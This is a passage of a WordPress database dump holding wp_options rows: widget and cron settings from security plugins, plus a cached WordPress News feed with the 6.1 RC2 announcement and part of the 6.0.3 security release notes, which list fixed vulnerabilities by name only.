:4:\"read\";b:1;s:7:\"level_0\";b:1;}}}','yes'),(101,'fresh_site','0','yes'),(102,'user_count','1','no'),(103,'widget_block','a:6:{i:2;a:1:{s:7:\"content\";s:19:\"<!-- wp:search /-->\";}i:3;a:1:{s:7:\"content\";s:154:\"<!-- wp:group --><div class=\"wp-block-group\"><!-- wp:heading --><h2>Recent Posts</h2><!-- /wp:heading --><!-- wp:latest-posts /--></div><!-- /wp:group -->\";}i:4;a:1:{s:7:\"content\";s:227:\"<!-- wp:group --><div class=\"wp-block-group\"><!-- wp:heading --><h2>Recent Comments</h2><!-- /wp:heading --><!-- wp:latest-comments {\"displayAvatar\":false,\"displayDate\":false,\"displayExcerpt\":false} /--></div><!-- /wp:group -->\";}i:5;a:1:{s:7:\"content\";s:146:\"<!-- wp:group --><div class=\"wp-block-group\"><!-- wp:heading --><h2>Archives</h2><!-- /wp:heading --><!-- wp:archives /--></div><!-- /wp:group -->\";}i:6;a:1:{s:7:\"content\";s:150:\"<!-- wp:group --><div class=\"wp-block-group\"><!-- wp:heading --><h2>Categories</h2><!-- /wp:heading --><!-- wp:categories /--></div><!-- /wp:group -->\";}s:12:\"_multiwidget\";i:1;}','yes'),(104,'sidebars_widgets','a:12:{s:19:\"wp_inactive_widgets\";a:0:{}s:12:\"sidebar-page\";a:3:{i:0;s:7:\"block-2\";i:1;s:7:\"block-3\";i:2;s:7:\"block-4\";}s:12:\"sidebar-blog\";a:2:{i:0;s:7:\"block-5\";i:1;s:7:\"block-6\";}s:12:\"our-services\";a:0:{}s:11:\"sidebar-woo\";a:0:{}s:10:\"headerleft\";a:0:{}s:11:\"headerright\";a:0:{}s:8:\"footer-1\";a:0:{}s:8:\"footer-2\";a:0:{}s:8:\"footer-3\";a:0:{}s:8:\"footer-4\";a:0:{}s:13:\"array_version\";i:3;}','yes'),(105,'cron','a:18:{i:1666307386;a:1:{s:26:\"action_scheduler_run_queue\";a:1:{s:32:\"0d04ed39571b55704c122d726248bbac\";a:3:{s:8:\"schedule\";s:12:\"every_minute\";s:4:\"args\";a:1:{i:0;s:7:\"WP Cron\";}s:8:\"interval\";i:60;}}}i:1666307400;a:1:{s:15:\"cerber_hourly_2\";a:1:{s:32:\"40cd750bba9870f18aada2478b24840a\";a:3:{s:8:\"schedule\";s:6:\"hourly\";s:4:\"args\";a:0:{}s:8:\"interval\";i:3600;}}}i:1666307579;a:1:{s:18:\"cerber_bg_launcher\";a:1:{s:32:\"40cd750bba9870f18aada2478b24840a\";a:3:{s:8:\"schedule\";s:8:\"crb_five\";s:4:\"args\";a:0:{}s:8:\"interval\";i:300;}}}i:1666308600;a:1:{s:21:\"wdf_maybe_send_report\";a:1:{s:32:\"40cd750bba9870f18aada2478b24840a\";a:3:{s:8:\"schedule\";s:14:\"thirty_minutes\";s:4:\"args\";a:0:{}s:8:\"interval\";i:1800;}}}i:1666308837;a:1:{s:22:\"firewall_clean_up_logs\";a:1:{s:32:\"40cd750bba9870f18aada2478b24840a\";a:3:{s:8:\"schedule\";s:6:\"hourly\";s:4:\"args\";a:0:{}s:8:\"interval\";i:3600;}}}i:1666309688;a:5:{s:32:\"recovery_mode_clean_expired_keys\";a:1:{s:32:\"40cd750bba9870f18aada2478b24840a\";a:3:{s:8:\"schedule\";s:5:\"daily\";s:4:\"args\";a:0:{}s:8:\"interval\";i:86400;}}s:18:\"wp_https_detection\";a:1:{s:32:\"40cd750bba9870f18aada2478b24840a\";a:3:{s:8:\"schedule\";s:10:\"twicedaily\";s:4:\"args\";a:0:{}s:8:\"interval\";i:43200;}}s:16:\"wp_version_check\";a:1:{s:32:\"40cd750bba9870f18aada2478b24840a\";a:3:{s:8:\"schedule\";s:10:\"twicedaily\";s:4:\"args\";a:0:{}s:8:\"interval\";i:43200;}}s:17:\"wp_update_plugins\";a:1:{s:32:\"40cd750bba9870f18aada2478b24840a\";a:3:{s:8:\"schedule\";s:10:\"twicedaily\";s:4:\"args\";a:0:{}s:8:\"interval\";i:43200;}}s:16:\"wp_update_themes\";a:1:{s:32:\"40cd750bba9870f18aada2478b24840a\";a:3:{s:8:\"schedule\";s:10:\"twicedaily\";s:4:\"args\";a:0:{}s:8:\"interval\";i:43200;}}}i:1666309689;a:1:{s:34:\"wp_privacy_delete_old_export_files\";a:1:{s:32:\"40cd750bba9870f18aada2478b24840a\";a:3:{s:8:\"schedule\";s:6:\"hourly\";s:4:\"args\";a:0:{}s:8:\"interval\";i:3600;}}}i:1666309787;a:2:{s:20:\"jetpack_v2_heartbeat\";a:1:{s:32:\"40cd750bba9870f18aada2478b24840a\";a:3:{s:8:\"schedule\";s:5:\"daily\";s:4:\"args\";a:0:{}s:8:\"interval\";i:86400;}}s:20:\"jetpack_clean_nonces\";a:1:{s:32:\"40cd750bba9870f18aada2478b24840a\";a:3:{s:8:\"schedule\";s:6:\"hourly\";s:4:\"args\";a:0:{}s:8:\"interval\";i:3600;}}}i:1666309790;a:3:{s:19:\"wp_scheduled_delete\";a:1:{s:32:\"40cd750bba9870f18aada2478b24840a\";a:3:{s:8:\"schedule\";s:5:\"daily\";s:4:\"args\";a:0:{}s:8:\"interval\";i:86400;}}s:25:\"delete_expired_transients\";a:1:{s:32:\"40cd750bba9870f18aada2478b24840a\";a:3:{s:8:\"schedule\";s:5:\"daily\";s:4:\"args\";a:0:{}s:8:\"interval\";i:86400;}}s:21:\"wp_update_user_counts\";a:1:{s:32:\"40cd750bba9870f18aada2478b24840a\";a:3:{s:8:\"schedule\";s:10:\"twicedaily\";s:4:\"args\";a:0:{}s:8:\"interval\";i:43200;}}}i:1666309791;a:1:{s:30:\"wp_scheduled_auto_draft_delete\";a:1:{s:32:\"40cd750bba9870f18aada2478b24840a\";a:3:{s:8:\"schedule\";s:5:\"daily\";s:4:\"args\";a:0:{}s:8:\"interval\";i:86400;}}}i:1666310400;a:2:{s:22:\"wdev_logger_clear_logs\";a:1:{s:32:\"40cd750bba9870f18aada2478b24840a\";a:3:{s:8:\"schedule\";s:5:\"daily\";s:4:\"args\";a:0:{}s:8:\"interval\";i:86400;}}s:15:\"cerber_hourly_1\";a:1:{s:32:\"40cd750bba9870f18aada2478b24840a\";a:3:{s:8:\"schedule\";s:6:\"hourly\";s:4:\"args\";a:0:{}s:8:\"interval\";i:3600;}}}i:1666311885;a:1:{s:21:\"ai1wm_storage_cleanup\";a:1:{s:32:\"40cd750bba9870f18aada2478b24840a\";a:3:{s:8:\"schedule\";s:5:\"daily\";s:4:\"args\";a:0:{}s:8:\"interval\";i:86400;}}}i:1666312428;a:1:{s:27:\"wpdef_log_rotational_delete\";a:1:{s:32:\"40cd750bba9870f18aada2478b24840a\";a:3:{s:8:\"schedule\";s:5:\"daily\";s:4:\"args\";a:0:{}s:8:\"interval\";i:86400;}}}i:1666316028;a:1:{s:22:\"wp_defender_clear_logs\";a:1:{s:32:\"40cd750bba9870f18aada2478b24840a\";a:3:{s:8:\"schedule\";s:5:\"daily\";s:4:\"args\";a:0:{}s:8:\"interval\";i:86400;}}}i:1666318800;a:1:{s:12:\"cerber_daily\";a:1:{s:32:\"40cd750bba9870f18aada2478b24840a\";a:3:{s:8:\"schedule\";s:5:\"daily\";s:4:\"args\";a:0:{}s:8:\"interval\";i:86400;}}}i:1666655288;a:1:{s:30:\"wp_site_health_scheduled_check\";a:1:{s:32:\"40cd750bba9870f18aada2478b24840a\";a:3:{s:8:\"schedule\";s:6:\"weekly\";s:4:\"args\";a:0:{}s:8:\"interval\";i:604800;}}}i:1666658027;a:1:{s:21:\"wpdef_clear_scan_logs\";a:1:{s:32:\"40cd750bba9870f18aada2478b24840a\";a:3:{s:8:\"schedule\";s:6:\"weekly\";s:4:\"args\";a:0:{}s:8:\"interval\";i:604800;}}}s:7:\"version\";i:2;}','yes'),(106,'widget_pages','a:1:{s:12:\"_multiwidget\";i:1;}','yes'),(107,'widget_calendar','a:1:{s:12:\"_multiwidget\";i:1;}','yes'),(108,'widget_archives','a:1:{s:12:\"_multiwidget\";i:1;}','yes'),(109,'widget_media_audio','a:1:{s:12:\"_multiwidget\";i:1;}','yes'),(110,'widget_media_image','a:1:{s:12:\"_multiwidget\";i:1;}','yes'),(111,'widget_media_gallery','a:1:{s:12:\"_multiwidget\";i:1;}','yes'),(112,'widget_media_video','a:1:{s:12:\"_multiwidget\";i:1;}','yes'),(113,'widget_meta','a:1:{s:12:\"_multiwidget\";i:1;}','yes'),(114,'widget_search','a:1:{s:12:\"_multiwidget\";i:1;}','yes'),(115,'widget_tag_cloud','a:1:{s:12:\"_multiwidget\";i:1;}','yes'),(116,'widget_nav_menu','a:1:{s:12:\"_multiwidget\";i:1;}','yes'),(117,'widget_custom_html','a:1:{s:12:\"_multiwidget\";i:1;}','yes'),(118,'recovery_keys','a:0:{}','yes'),(119,'theme_mods_twentytwentytwo','a:2:{s:18:\"custom_css_post_id\";i:-1;s:16:\"sidebars_widgets\";a:2:{s:4:\"time\";i:1661125932;s:4:\"data\";a:3:{s:19:\"wp_inactive_widgets\";a:0:{}s:9:\"sidebar-1\";a:3:{i:0;s:7:\"block-2\";i:1;s:7:\"block-3\";i:2;s:7:\"block-4\";}s:9:\"sidebar-2\";a:2:{i:0;s:7:\"block-5\";i:1;s:7:\"block-6\";}}}}','yes'),(125,'https_detection_errors','a:0:{}','yes'),(20017,'_site_transient_php_check_e9a080274371e157ce748ced527522b3','a:5:{s:19:\"recommended_version\";s:3:\"7.4\";s:15:\"minimum_version\";s:6:\"5.6.20\";s:12:\"is_supported\";b:1;s:9:\"is_secure\";b:1;s:13:\"is_acceptable\";b:1;}','no'),(20022,'_transient_feed_9bbd59226dc36b9b26cd43f15694c5c3','a:4:{s:5:\"child\";a:1:{s:0:\"\";a:1:{s:3:\"rss\";a:1:{i:0;a:6:{s:4:\"data\";s:3:\"\n\n\n\";s:7:\"attribs\";a:1:{s:0:\"\";a:1:{s:7:\"version\";s:3:\"2.0\";}}s:8:\"xml_base\";s:0:\"\";s:17:\"xml_base_explicit\";b:0;s:8:\"xml_lang\";s:0:\"\";s:5:\"child\";a:1:{s:0:\"\";a:1:{s:7:\"channel\";a:1:{i:0;a:6:{s:4:\"data\";s:112:\"\n	\n	\n	\n	\n	\n	\n	\n	\n	\n\n \n	\n		\n		\n		\n		\n		\n		\n		\n		\n		\n		\n		\n		\n		\n		\n		\n		\n		\n		\n		\n		\n		\n		\n		\n		\n		\n		\n		\n		\n		\n	\";s:7:\"attribs\";a:0:{}s:8:\"xml_base\";s:0:\"\";s:17:\"xml_base_explicit\";b:0;s:8:\"xml_lang\";s:0:\"\";s:5:\"child\";a:4:{s:0:\"\";a:8:{s:5:\"title\";a:1:{i:0;a:5:{s:4:\"data\";s:14:\"WordPress News\";s:7:\"attribs\";a:0:{}s:8:\"xml_base\";s:0:\"\";s:17:\"xml_base_explicit\";b:0;s:8:\"xml_lang\";s:0:\"\";}}s:4:\"link\";a:1:{i:0;a:5:{s:4:\"data\";s:26:\"https://wordpress.org/news\";s:7:\"attribs\";a:0:{}s:8:\"xml_base\";s:0:\"\";s:17:\"xml_base_explicit\";b:0;s:8:\"xml_lang\";s:0:\"\";}}s:11:\"description\";a:1:{i:0;a:5:{s:4:\"data\";s:59:\"The latest news about WordPress and the WordPress community\";s:7:\"attribs\";a:0:{}s:8:\"xml_base\";s:0:\"\";s:17:\"xml_base_explicit\";b:0;s:8:\"xml_lang\";s:0:\"\";}}s:13:\"lastBuildDate\";a:1:{i:0;a:5:{s:4:\"data\";s:31:\"Thu, 20 Oct 2022 08:59:29 +0000\";s:7:\"attribs\";a:0:{}s:8:\"xml_base\";s:0:\"\";s:17:\"xml_base_explicit\";b:0;s:8:\"xml_lang\";s:0:\"\";}}s:8:\"language\";a:1:{i:0;a:5:{s:4:\"data\";s:5:\"en-US\";s:7:\"attribs\";a:0:{}s:8:\"xml_base\";s:0:\"\";s:17:\"xml_base_explicit\";b:0;s:8:\"xml_lang\";s:0:\"\";}}s:9:\"generator\";a:1:{i:0;a:5:{s:4:\"data\";s:40:\"https://wordpress.org/?v=6.2-alpha-54654\";s:7:\"attribs\";a:0:{}s:8:\"xml_base\";s:0:\"\";s:17:\"xml_base_explicit\";b:0;s:8:\"xml_lang\";s:0:\"\";}}s:5:\"image\";a:1:{i:0;a:6:{s:4:\"data\";s:11:\"\n	\n	\n	\n	\n	\n\";s:7:\"attribs\";a:0:{}s:8:\"xml_base\";s:0:\"\";s:17:\"xml_base_explicit\";b:0;s:8:\"xml_lang\";s:0:\"\";s:5:\"child\";a:1:{s:0:\"\";a:5:{s:3:\"url\";a:1:{i:0;a:5:{s:4:\"data\";s:29:\"https://s.w.org/favicon.ico?2\";s:7:\"attribs\";a:0:{}s:8:\"xml_base\";s:0:\"\";s:17:\"xml_base_explicit\";b:0;s:8:\"xml_lang\";s:0:\"\";}}s:5:\"title\";a:1:{i:0;a:5:{s:4:\"data\";s:14:\"WordPress News\";s:7:\"attribs\";a:0:{}s:8:\"xml_base\";s:0:\"\";s:17:\"xml_base_explicit\";b:0;s:8:\"xml_lang\";s:0:\"\";}}s:4:\"link\";a:1:{i:0;a:5:{s:4:\"data\";s:26:\"https://wordpress.org/news\";s:7:\"attribs\";a:0:{}s:8:\"xml_base\";s:0:\"\";s:17:\"xml_base_explicit\";b:0;s:8:\"xml_lang\";s:0:\"\";}}s:5:\"width\";a:1:{i:0;a:5:{s:4:\"data\";s:2:\"32\";s:7:\"attribs\";a:0:{}s:8:\"xml_base\";s:0:\"\";s:17:\"xml_base_explicit\";b:0;s:8:\"xml_lang\";s:0:\"\";}}s:6:\"height\";a:1:{i:0;a:5:{s:4:\"data\";s:2:\"32\";s:7:\"attribs\";a:0:{}s:8:\"xml_base\";s:0:\"\";s:17:\"xml_base_explicit\";b:0;s:8:\"xml_lang\";s:0:\"\";}}}}}}s:4:\"item\";a:30:{i:0;a:6:{s:4:\"data\";s:69:\"\n		\n		\n		\n		\n		\n				\n		\n		\n		\n		\n		\n\n					\n										\n					\n		\n		\n			\";s:7:\"attribs\";a:0:{}s:8:\"xml_base\";s:0:\"\";s:17:\"xml_base_explicit\";b:0;s:8:\"xml_lang\";s:0:\"\";s:5:\"child\";a:4:{s:0:\"\";a:6:{s:5:\"title\";a:1:{i:0;a:5:{s:4:\"data\";s:53:\"WordPress 6.1 Release Candidate 2 (RC2) Now Available\";s:7:\"attribs\";a:0:{}s:8:\"xml_base\";s:0:\"\";s:17:\"xml_base_explicit\";b:0;s:8:\"xml_lang\";s:0:\"\";}}s:4:\"link\";a:1:{i:0;a:5:{s:4:\"data\";s:83:\"https://wordpress.org/news/2022/10/wordpress-6-1-release-candidate-2-now-available/\";s:7:\"attribs\";a:0:{}s:8:\"xml_base\";s:0:\"\";s:17:\"xml_base_explicit\";b:0;s:8:\"xml_lang\";s:0:\"\";}}s:7:\"pubDate\";a:1:{i:0;a:5:{s:4:\"data\";s:31:\"Tue, 18 Oct 2022 19:31:20 +0000\";s:7:\"attribs\";a:0:{}s:8:\"xml_base\";s:0:\"\";s:17:\"xml_base_explicit\";b:0;s:8:\"xml_lang\";s:0:\"\";}}s:8:\"category\";a:5:{i:0;a:5:{s:4:\"data\";s:11:\"Development\";s:7:\"attribs\";a:0:{}s:8:\"xml_base\";s:0:\"\";s:17:\"xml_base_explicit\";b:0;s:8:\"xml_lang\";s:0:\"\";}i:1;a:5:{s:4:\"data\";s:8:\"Releases\";s:7:\"attribs\";a:0:{}s:8:\"xml_base\";s:0:\"\";s:17:\"xml_base_explicit\";b:0;s:8:\"xml_lang\";s:0:\"\";}i:2;a:5:{s:4:\"data\";s:3:\"6.1\";s:7:\"attribs\";a:0:{}s:8:\"xml_base\";s:0:\"\";s:17:\"xml_base_explicit\";b:0;s:8:\"xml_lang\";s:0:\"\";}i:3;a:5:{s:4:\"data\";s:11:\"development\";s:7:\"attribs\";a:0:{}s:8:\"xml_base\";s:0:\"\";s:17:\"xml_base_explicit\";b:0;s:8:\"xml_lang\";s:0:\"\";}i:4;a:5:{s:4:\"data\";s:8:\"releases\";s:7:\"attribs\";a:0:{}s:8:\"xml_base\";s:0:\"\";s:17:\"xml_base_explicit\";b:0;s:8:\"xml_lang\";s:0:\"\";}}s:4:\"guid\";a:1:{i:0;a:5:{s:4:\"data\";s:35:\"https://wordpress.org/news/?p=13646\";s:7:\"attribs\";a:1:{s:0:\"\";a:1:{s:11:\"isPermaLink\";s:5:\"false\";}}s:8:\"xml_base\";s:0:\"\";s:17:\"xml_base_explicit\";b:0;s:8:\"xml_lang\";s:0:\"\";}}s:11:\"description\";a:1:{i:0;a:5:{s:4:\"data\";s:332:\"WordPress 6.1 Release Candidate 2 is now available for download and testing.\n\nThis version of the WordPress software is under development. Please do not install, run, or test this version of WordPress on production or mission-critical websites. Instead, it is recommended that you test Release Candidate 2 on a test server and site.\";s:7:\"attribs\";a:0:{}s:8:\"xml_base\";s:0:\"\";s:17:\"xml_base_explicit\";b:0;s:8:\"xml_lang\";s:0:\"\";}}}s:32:\"http://purl.org/dc/elements/1.1/\";a:1:{s:7:\"creator\";a:1:{i:0;a:5:{s:4:\"data\";s:16:\"Jonathan Pantani\";s:7:\"attribs\";a:0:{}s:8:\"xml_base\";s:0:\"\";s:17:\"xml_base_explicit\";b:0;s:8:\"xml_lang\";s:0:\"\";}}}s:40:\"http://purl.org/rss/1.0/modules/content/\";a:1:{s:7:\"encoded\";a:1:{i:0;a:5:{s:4:\"data\";s:6856:\"\n<hr class=\"wp-block-separator has-alpha-channel-opacity\" />\n\n\n\n<p>The second release candidate (RC2) for WordPress 6.1 is now available!</p>\n\n\n\n<hr class=\"wp-block-separator has-alpha-channel-opacity\" />\n\n\n\n<p>“Release Candidate” means that this version of WordPress is ready for release and it is a key milestone in the 6.1 release cycle! Before the official release date, the community sets aside time to perform final reviews and help test. Since the WordPress ecosystem includes thousands of plugins and themes, it is important that everyone checks to see if anything has been missed along the way. That means the project would <em>greatly benefit from</em> your assistance.</p>\n\n\n\n<p>WordPress 6.1 is planned for official release on November 1st, 2022, two weeks from today.&nbsp;</p>\n\n\n\n<p><strong>This version of the WordPress software is under development</strong>. Please do not install, run, or test this version of WordPress on production or mission-critical websites. Instead, it is recommended that you test RC2 on a test server and site.&nbsp;</p>\n\n\n\n<p>You can test WordPress 6.1 RC2 in three ways:</p>\n\n\n\n<p><strong>Option 1: </strong>Install and activate the <a href=\"https://wordpress.org/plugins/wordpress-beta-tester/\">WordPress Beta Tester</a> plugin (select the “Bleeding edge” channel and “Beta/RC Only” stream).</p>\n\n\n\n<p><strong>Option 2: </strong>Direct download the <a href=\"https://wordpress.org/wordpress-6.1-RC2.zip\">RC2 version (zip)</a>.</p>\n\n\n\n<p><strong>Option 3:</strong> Use the WP-CLI command:</p>\n\n\n\n<p><code>wp core update --version=6.1-RC2</code></p>\n\n\n\n<p>Additional information on the <a href=\"https://make.wordpress.org/core/6-1/\">6.1 release cycle is available here</a>.</p>\n\n\n\n<p>Check the <a href=\"https://make.wordpress.org/core/\">Make WordPress Core blog</a> for <a href=\"https://make.wordpress.org/core/tag/dev-notes+6-1/\">6.1-related developer notes</a> in the coming weeks detailing all upcoming changes.</p>\n\n\n\n<h2><strong>What’s in WordPress 6.1 RC2?</strong></h2>\n\n\n\n<p>Since Release Candidate 1, approximately 65 items have been addressed, bringing the total count to more than 2,000 updates since WordPress 6.0 in May of 2022.&nbsp;</p>\n\n\n\n<ul>\n<li><a href=\"https://github.com/WordPress/gutenberg/commits/wp/6.1\">GitHub tickets</a></li>\n\n\n\n<li><a href=\"https://core.trac.wordpress.org/query?status=accepted&amp;status=closed&amp;changetime=10%2F11%2F2022..10%2F18%2F2022&amp;resolution=fixed&amp;milestone=6.1&amp;col=id&amp;col=summary&amp;col=status&amp;col=milestone&amp;col=owner&amp;col=type&amp;col=priority&amp;order=id\">Trac tickets</a>&nbsp;</li>\n</ul>\n\n\n\n<p>WordPress 6.1 is the third major release for 2022, following 5.9 and 6.0, released in January and May of this year, respectively.</p>\n\n\n\n<p>To learn more about the highlights for both end-users and developers, you’re invited to read more about them in the <a href=\"https://wordpress.org/news/2022/10/wordpress-6-1-release-candidate-1-rc1-now-available/\">RC1 announcement post</a> and review the <a href=\"https://make.wordpress.org/core/2022/10/12/wordpress-6-1-field-guide/\">WordPress 6.1 Field Guide</a>.</p>\n\n\n\n<h2><strong>Plugin and theme developers</strong></h2>\n\n\n\n<p>All plugin and theme developers should test their respective extensions against WordPress 6.1 RC2 and update the “<em>Tested up to”</em> version in their readme file to 6.1. If you find compatibility problems, please post detailed information to the <a href=\"https://wordpress.org/support/forum/alphabeta/\">support forums</a>, so these items can be investigated further prior to the final release date of November 1st.</p>\n\n\n\n<h2><strong>Translate WordPress</strong></h2>\n\n\n\n<p>Do you speak a language other than English? <a href=\"https://translate.wordpress.org/projects/wp/dev\">Help translate WordPress into more than 100 languages.</a>&nbsp;</p>\n\n\n\n<p><strong>Keep WordPress bug-free – help with testing</strong></p>\n\n\n\n<p>Testing for issues is critical for stabilizing a release throughout its development. Testing is also a great way to contribute. <a href=\"https://make.wordpress.org/test/2022/09/21/help-test-wordpress-6-1/\">This detailed guide</a> is an excellent start if you have never tested a beta release.</p>\n\n\n\n<p>Testing helps ensure that this and future releases of WordPress are as stable and issue-free as possible. Anyone can take part in testing – regardless of prior experience.</p>\n\n\n\n<p>Want to know more about testing releases like this one? Read about the <a href=\"https://make.wordpress.org/test/\">testing initiatives</a> that happen in Make Core. You can also join a <a href=\"https://wordpress.slack.com/messages/core-test/\">core-test channel</a> on the <a href=\"https://wordpress.slack.com/\">Making WordPress Slack workspace</a>.</p>\n\n\n\n<p>If you have run into an issue, please report it to the <a href=\"https://wordpress.org/support/forum/alphabeta/\">Alpha/Beta area</a> in the support forums. If you are comfortable writing a reproducible bug report, you can <a href=\"https://core.trac.wordpress.org/newticket\">file one on WordPress Trac</a>. This is also where you can find a list of <a href=\"https://core.trac.wordpress.org/tickets/major\">known bugs</a>.</p>\n\n\n\n<p>To review features in the Gutenberg releases since WordPress 6.0 (the most recent major release of WordPress), access the <em>What’s New In Gutenberg</em> posts for <a href=\"https://wp.me/p2AvED-pYR\">14.3</a>, <a href=\"https://wp.me/p2AvED-pMn\">14.2</a>, <a href=\"https://make.wordpress.org/core/2022/09/16/whats-new-in-gutenberg-14-1-15-september/\">14.1</a>, <a href=\"https://make.wordpress.org/core/2022/09/01/whats-new-in-gutenberg-14-0-31-august/\">14.0</a>, <a href=\"https://make.wordpress.org/core/2022/08/17/whats-new-in-gutenberg-13-9-17-august/\">13.9</a>, <a href=\"https://make.wordpress.org/core/2022/08/04/whats-new-in-gutenberg-13-8-3-august/\">13.8</a>, <a href=\"https://make.wordpress.org/core/2022/07/20/whats-new-in-gutenberg-13-7-20-july/\">13.7</a>, <a href=\"https://make.wordpress.org/core/2022/07/07/whats-new-in-gutenberg-13-6-6-july/\">13.6</a>, <a href=\"https://make.wordpress.org/core/2022/06/22/whats-new-in-gutenberg-13-5-22-june/\">13.5</a>, <a href=\"https://make.wordpress.org/core/2022/06/10/whats-new-in-gutenberg-13-4-8-june/\">13.4</a>, <a href=\"https://make.wordpress.org/core/2022/05/26/whats-new-in-gutenberg-13-3-0-may-25/\">13.3</a>, <a href=\"https://make.wordpress.org/core/2022/05/12/whats-new-in-gutenberg-13-2-may-11/\">13.2</a>, and <a href=\"https://make.wordpress.org/core/2022/04/28/whats-new-in-gutenberg-13-1-27-april/\">13.1</a>.</p>\n\n\n\n<hr class=\"wp-block-separator has-alpha-channel-opacity\" />\n\n\n\n<h2><strong>Haiku Fun for RC2</strong></h2>\n\n\n\n<p><em>Two weeks from the launch&nbsp;</em></p>\n\n\n\n<p><em>Constant improvements we make&nbsp;</em></p>\n\n\n\n<p><em>Great outcomes await&nbsp;</em></p>\n\";s:7:\"attribs\";a:0:{}s:8:\"xml_base\";s:0:\"\";s:17:\"xml_base_explicit\";b:0;s:8:\"xml_lang\";s:0:\"\";}}}s:30:\"com-wordpress:feed-additions:1\";a:1:{s:7:\"post-id\";a:1:{i:0;a:5:{s:4:\"data\";s:5:\"13646\";s:7:\"attribs\";a:0:{}s:8:\"xml_base\";s:0:\"\";s:17:\"xml_base_explicit\";b:0;s:8:\"xml_lang\";s:0:\"\";}}}}}i:1;a:6:{s:4:\"data\";s:60:\"\n		\n		\n		\n		\n		\n				\n		\n		\n\n					\n										\n					\n		\n		\n			\";s:7:\"attribs\";a:0:{}s:8:\"xml_base\";s:0:\"\";s:17:\"xml_base_explicit\";b:0;s:8:\"xml_lang\";s:0:\"\";s:5:\"child\";a:4:{s:0:\"\";a:6:{s:5:\"title\";a:1:{i:0;a:5:{s:4:\"data\";s:32:\"WordPress 6.0.3 Security Release\";s:7:\"attribs\";a:0:{}s:8:\"xml_base\";s:0:\"\";s:17:\"xml_base_explicit\";b:0;s:8:\"xml_lang\";s:0:\"\";}}s:4:\"link\";a:1:{i:0;a:5:{s:4:\"data\";s:68:\"https://wordpress.org/news/2022/10/wordpress-6-0-3-security-release/\";s:7:\"attribs\";a:0:{}s:8:\"xml_base\";s:0:\"\";s:17:\"xml_base_explicit\";b:0;s:8:\"xml_lang\";s:0:\"\";}}s:7:\"pubDate\";a:1:{i:0;a:5:{s:4:\"data\";s:31:\"Mon, 17 Oct 2022 22:55:55 +0000\";s:7:\"attribs\";a:0:{}s:8:\"xml_base\";s:0:\"\";s:17:\"xml_base_explicit\";b:0;s:8:\"xml_lang\";s:0:\"\";}}s:8:\"category\";a:2:{i:0;a:5:{s:4:\"data\";s:8:\"Releases\";s:7:\"attribs\";a:0:{}s:8:\"xml_base\";s:0:\"\";s:17:\"xml_base_explicit\";b:0;s:8:\"xml_lang\";s:0:\"\";}i:1;a:5:{s:4:\"data\";s:8:\"Security\";s:7:\"attribs\";a:0:{}s:8:\"xml_base\";s:0:\"\";s:17:\"xml_base_explicit\";b:0;s:8:\"xml_lang\";s:0:\"\";}}s:4:\"guid\";a:1:{i:0;a:5:{s:4:\"data\";s:35:\"https://wordpress.org/news/?p=13618\";s:7:\"attribs\";a:1:{s:0:\"\";a:1:{s:11:\"isPermaLink\";s:5:\"false\";}}s:8:\"xml_base\";s:0:\"\";s:17:\"xml_base_explicit\";b:0;s:8:\"xml_lang\";s:0:\"\";}}s:11:\"description\";a:1:{i:0;a:5:{s:4:\"data\";s:358:\"WordPress 6.0.3 is now available! This release features several security fixes. Because this is a security release, it is recommended that you update your sites immediately. All versions since WordPress 3.7 have also been updated. WordPress 6.0.3 is a short-cycle release. The next major release will be version 6.1 planned for November 1, 2022. If [&#8230;]\";s:7:\"attribs\";a:0:{}s:8:\"xml_base\";s:0:\"\";s:17:\"xml_base_explicit\";b:0;s:8:\"xml_lang\";s:0:\"\";}}}s:32:\"http://purl.org/dc/elements/1.1/\";a:1:{s:7:\"creator\";a:1:{i:0;a:5:{s:4:\"data\";s:9:\"Jb Audras\";s:7:\"attribs\";a:0:{}s:8:\"xml_base\";s:0:\"\";s:17:\"xml_base_explicit\";b:0;s:8:\"xml_lang\";s:0:\"\";}}}s:40:\"http://purl.org/rss/1.0/modules/content/\";a:1:{s:7:\"encoded\";a:1:{i:0;a:5:{s:4:\"data\";s:6151:\"\n<p><strong>WordPress 6.0.3</strong> is now available!</p>\n\n\n\n<p>This release features several security fixes. Because this is a <strong>security release</strong>, it is recommended that you update your sites immediately. All versions since WordPress 3.7 have also been updated.</p>\n\n\n\n<p>WordPress 6.0.3 is a short-cycle release. The next major release will be <a href=\"https://make.wordpress.org/core/6-1/\">version 6.1</a> planned for November 1, 2022.</p>\n\n\n\n<p>If you have sites that support automatic background updates, the update process will begin automatically.</p>\n\n\n\n<p>You can <a href=\"https://wordpress.org/wordpress-6.0.3.zip\">download WordPress 6.0.3 from WordPress.org</a>, or visit your WordPress Dashboard, click “Updates”, and then click “Update Now”.</p>\n\n\n\n<p>For more information on this release, please <a href=\"https://wordpress.org/support/wordpress-version/version-6-0-3\">visit the HelpHub site</a>.</p>\n\n\n\n<h2>Security updates included in this release</h2>\n\n\n\n<p>The security team would like to thank the following people for responsibly reporting vulnerabilities, and allowing them to be fixed in this release.</p>\n\n\n\n<ul>\n<li>Stored XSS via wp-mail.php (post by email) &#8211; Toshitsugu Yoneyama of Mitsui Bussan Secure Directions, Inc. via JPCERT</li>\n\n\n\n<li>Open redirect in `wp_nonce_ays` &#8211; <a href=\"https://hackerone.com/devrayn\">devrayn</a></li>\n\n\n\n<li>Sender&#8217;s email address is exposed in wp-mail.php &#8211; Toshitsugu Yoneyama of Mitsui Bussan Secure Directions, Inc. via JPCERT</li>\n\n\n\n<li>Media Library &#8211; Reflected XSS via SQLi &#8211; Ben Bidner from the WordPress security team and Marc Montpas from Automattic independently discovered this issue</li>\n\n\n\n<li>CSRF in wp-trackback.php &#8211; Simon Scannell</li>\n\n\n\n<li>Stored XSS via the Customizer &#8211; Alex Concha from the WordPress security team</li>\n\n\n\n<li>Revert shared user instances introduced in <a href=\"https://core.trac.wordpress.org/changeset/50790\">50790</a> &#8211; Alex Concha and Ben Bidner from the WordPress security team</li>\n\n\n\n<li>Stored XSS in WordPress Core via Comment Editing &#8211; Third-party security audit and Alex Concha from the WordPress security team</li>\n\n\n\n<li>Data exposure via the REST Terms/Tags Endpoint &#8211; Than Taintor</li>\n\n\n\n<li>Content from multipart emails leaked &#8211; <a href=\"https://profiles.wordpress.org/kraftner\">Thomas Kräftner</a></li>\n\n\n\n<li>SQL Injection due to improper sanitization in `WP_Date_Query` &#8211; <a href=\"https://www.gold-network.ch\">Michael Mazzolini</a></li>\n\n\n\n<li>RSS Widget: Stored XSS issue &#8211; Third-party security audit</li>\n\n\n\n<li>Stored XSS in the search block &#8211; Alex Concha of the WP Security 